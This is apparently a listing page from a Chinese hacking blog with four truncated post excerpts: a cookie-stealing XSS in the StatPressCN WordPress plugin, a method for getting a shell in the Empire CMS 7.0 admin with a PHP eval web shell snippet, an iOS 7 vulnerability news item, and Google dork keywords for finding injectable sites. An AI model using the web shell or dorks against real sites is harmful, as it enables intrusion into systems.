• wordpress插件StatPressCN存XSS跨站获取用户cookie

    statpresscn是流行的wordpress站点统计插件的中文版,虽然已经很久未更新,而且wp官网统计也仅仅不到10万次下载;但因为这个插件被某国内wp托管服务商(对方宣称拥有数百万用户)作为内置插件被默认启用,所以危害还是有些大的。 在统计页面中,可以详细记录站点的每次访问。其中流量来源展示时,提供一个表格输出来源网站,而statpress的中文版未进行字符串过滤直接输出。...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 帝国cms7.0 后台拿shell两种方法

    帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码。 首先进入后台 第一个方法:点击系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型” 如图: “导入系统模型”,可进入“LoadInM.php”页面。 如图: 在本地新建一个文件,文本内容为<?fputs(fopen(“x.php”,”w”),”<?eval(\$_POST[cmd])...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 黑客轻松破解iOS7 银行账号可被泄露

    北京时间10月4日消息,据《路透社》报道,德国安全研究公司表示,又发现了苹果iOS 7操作系统上一个安全漏洞,该漏洞能让黑客轻松破解手机保护系统,并远程控制该手机。 德国柏林的安全研究实验室(Security Research Labs,简称“SRL”)周四表示,苹果最新发布的iOS 7操作系统,可能有黑客已经完全破解了安全系统,可以远程掌控iPhone,并可以让黑客自由登入用户的电子邮件,或...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:漏洞公布 | 暂无评论
  • 网站注入大全关键字

    inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字  inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字) inurl:Article_Print.asp? site 指定网站 inurl:Article_Print.asp? NewsInfo.asp?id= ShowNew.asp?Id= ShowNews.asp?Id= Show.asp?Id= Google dorks sql ...阅读全文
    作者:qxz_xp | 发布:2013年10月06日 | 分类:菜鸟入门, 黑客攻防 | 5条评论